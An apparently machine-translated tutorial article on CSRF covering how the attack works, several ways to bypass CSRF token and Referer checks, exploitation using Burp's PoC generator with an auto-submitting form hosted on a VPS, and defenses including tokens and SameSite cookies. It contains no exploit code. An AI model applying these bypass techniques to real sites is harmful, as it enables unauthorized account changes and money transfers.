Shulou(Shulou.com)06/01 Report--

This article mainly introduces the relevant knowledge of CSRF cross-site request forgery vulnerability analysis and defense methods, the content is detailed and easy to understand, the operation is simple and fast, and has a certain reference value. I believe you will gain something after reading this CSRF cross-site request forgery vulnerability analysis and defense method article. Let's take a look at it.

CSRF

Today's websites all use CSRF tokens to prevent CSRF, that is, to add a value of csrf in the field of the request package to prevent csrf. If you want to exploit this vulnerability, you should combine it with xss and use xss to obtain the csrf value. If you add CSRF value in the constructed request, you can bypass the CSRF defense and exploit the loophole.

The difference between this vulnerability and xss: xss obtains the user's cookie and other information by executing malicious scripts, and then uses cookie and other information to bypass login restrictions and do some things that users can do.

On the other hand, csrf is a fake request, which allows the user to execute the request forged by the attacker, which is done by the user himself.

Loophole principle

Cross-site request forgery, the attacker forges a request (usually a malicious link) to send to the user, the user clicks the link when logging in, the server will execute the request forged by the attacker as the user, resulting in an attack.

Vulnerability hazard

1. Modify user information: modify mailbox, change password, transfer money, etc.

If the modified information is submitted by GET, we will send the url of the modified information directly to the user. If the user clicks the link when logging in, his information will be changed to the value in our url.

If it is POST, then we need to set up a public network server, forge an automatically submitted form to modify the user's information, and also send the user a link to allow the user to visit the form we constructed when logging in to the vulnerable website, so as to modify the user's information.

Defense bypass

1. Switch the request method to bypass CSRF token verification:

Some applications validate CSRF tokens only in POST requests, so we can bypass CSRF token verification by changing the request method to GET.

Grab the packet and use burp's Change request method to change the request to GET mode.

Then use the CSRF poc generator to generate a poc that automatically submits the script code.

two。 The existence of a token is verified:

We can delete the CSRF token parameter directly to see if it can be bypassed, because some applications authenticate only when the token exists, but not if the token does not exist.

3. The token is not bound to the user session bypass:

The application does not bind the CSRF token to the user's session, but authenticates it in his token pool, as long as the token in the request exists in the token pool. An attacker can log in using his own account, get a valid token, and then bypass token authentication and cause an attack after the attacker provides the token to a normal user.

4. The token is not bound to the session cookie:

Although the token is bound to a cookie, it is not bound to the cookie used to trace the session. This can easily happen when an application uses two different frameworks. One cookie is for session processing and one is for CSRF protection, both of which are not integrated.

Vulnerability exploitation

Use burp's CSRF poc generator to generate poc. Then copy the poc into your own vps, give the user access to the poc, and the attack is complete.

Because you want to automatically submit a request for modification information, in burp, check include auto-submit script to regenerate a poc that can be submitted automatically.

Defensive measures

1. Add token authentication:

Add a randomly generated token as a parameter to the http request, validate the token value on the server, and reject the request if the token does not exist or is incorrect.

two。 Verify the referer field:

Verify the http request packet referer field value, which records the source url of the http request. If the source address is different, the request is invalid and the server rejects the request. This defense can be bypassed by an attacker who customizes the referer field to bypass.

Or delete the Referer field value directly, or you can bypass it.

3. Re-authenticate key operations:

Change the password, reset the password, etc., to carry out secondary authentication, or add CAPTCHA verification.

4. Use SameSite cookie

The SameSite attribute is used to control whether cookie is included in a cross-site request. Usually used with CSRF tokens.

If this property is set to SameSite=Strict;, the browser will not include cookie in any requests from other sites, which, although most defensive, affects the user experience, showing that users are not logged in when they visit third-party links. You need to log in again to interact with the site properly.

If set to SameSite=Lax; browser will determine whether the cross-site request is GET or POST request, if it is a GET request, it will include cookie, if it is other request methods, it will not include cookie. It also determines whether the request is the user's top-level navigation (click on the link) and does not include cookie if it is another request, such as a request initiated by a script.

Set-Cookie: SessionId=sYMnfCUrAlmqVVZn9dqevxyFpKZt30NN; SameSite=Strict;Set-Cookie: SessionId=sYMnfCUrAlmqVVZn9dqevxyFpKZt30NN; SameSite=Lax

5. CSRF token authentication

When the server-side application generates and is included in subsequent http requests, all subsequent http requests need to contain the token, and if the token is lost or invalid, the server will reject the request.

This is the end of the article on "Analysis and Prevention of CSRF Cross-site request forgery vulnerabilities". Thank you for reading! I believe you all have a certain understanding of the knowledge of "CSRF cross-site request forgery vulnerability analysis and defense methods". If you want to learn more, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.